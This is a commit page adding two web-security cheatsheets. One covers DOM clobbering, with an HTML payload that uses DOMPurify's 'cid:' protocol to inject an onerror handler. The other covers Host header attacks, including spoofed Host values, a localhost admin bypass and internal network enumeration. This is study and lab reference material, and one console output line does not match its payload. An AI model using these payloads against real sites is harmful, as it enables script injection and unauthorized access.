Skip to content

Commit

Permalink
add dom clob and host header
Browse files Browse the repository at this point in the history
  • Loading branch information
@xanhacks
xanhacks committed Dec 13, 2022
1 parent e780a02 commit dfa5527
Show file tree
Hide file tree
Showing 2 changed files with 60 additions and 0 deletions.
33 changes: 33 additions & 0 deletions docs/web/dom-clobbering.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
---
title: DOM Clobbering
description: DOM Clobbering cheatsheet
---

## Definition

**DOM Clobbering** is a type of attack that involves **overwriting the properties of a Document Object Model (DOM)** object in a web page with malicious code. This can allow an attacker to execute arbitrary JavaScript code in the victim's browser, potentially leading to the theft of sensitive information or other malicious activities. The term "clobbering" refers to the way in which the attacker overwrites the properties of the DOM object, effectively "clobbering" the original values with their own. DOM Clobbering attacks are often used in conjunction with cross-site scripting (XSS) attacks, and can be difficult to defend against. It is important for web developers to be aware of this type of attack and take steps to prevent it.

## Cheatsheet

```html
<div id="defaultAvatar"></div>
<a id="defaultAvatar" name="avatar" href="cid:&quot;onerror=alert(1)//">
```

```javascript
window.defaultAvatar
// HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]
defaultAvatar
// HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]

defaultAvatar.avatar
// <a id="defaultAvatar" name="avatar" href="javascript:alert()"></a>
defaultAvatar.avatar + ''
// 'cid:"onerror=alert(1)//'
```

> `DOMPurify` allows you to use the `cid:` protocol, which does **not** URL-encode double-quotes.
## References

- [PortSwigger - DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
27 changes: 27 additions & 0 deletions docs/web/host-header-attack.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@

# Host header attack

## Definition

A **Host header attack** is a type of cyber attack in which an attacker manipulates the Host header of a request in order to trick a web server into thinking the request is coming from a different website. This can allow the attacker to access resources or information that they would not normally have access to, or to perform actions on the targeted website that they would not normally be able to do. The Host header is a field in the HTTP request header that specifies the domain name of the website that the client is trying to access. By modifying this field, an attacker can direct the server to respond to their request as if it were coming from a different website.

## Cheatsheet

- `Host: exploit-XXXX`
- `X-Forwarded-Host: exploit-XXXXX`
- `GET /admin` bypass with `Host: localhost`
- Enum local networks : `Host: 192.168.0.67`, from 1 to 255
- Absolute URL in path :

```
POST https://example.com/admin/delete HTTP/1.1
Host: 192.168.0.15
...
```

- Submit double Host header (link $HOST/resource/toto.js, spoof host in cache)
- Bypass host header check with `Connection: keep-alive`, [connection-state-attack](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack)

## References

- [PortSwigger - HTTP Host header attacks](https://portswigger.net/web-security/host-header)

0 comments on commit dfa5527

Please sign in to comment.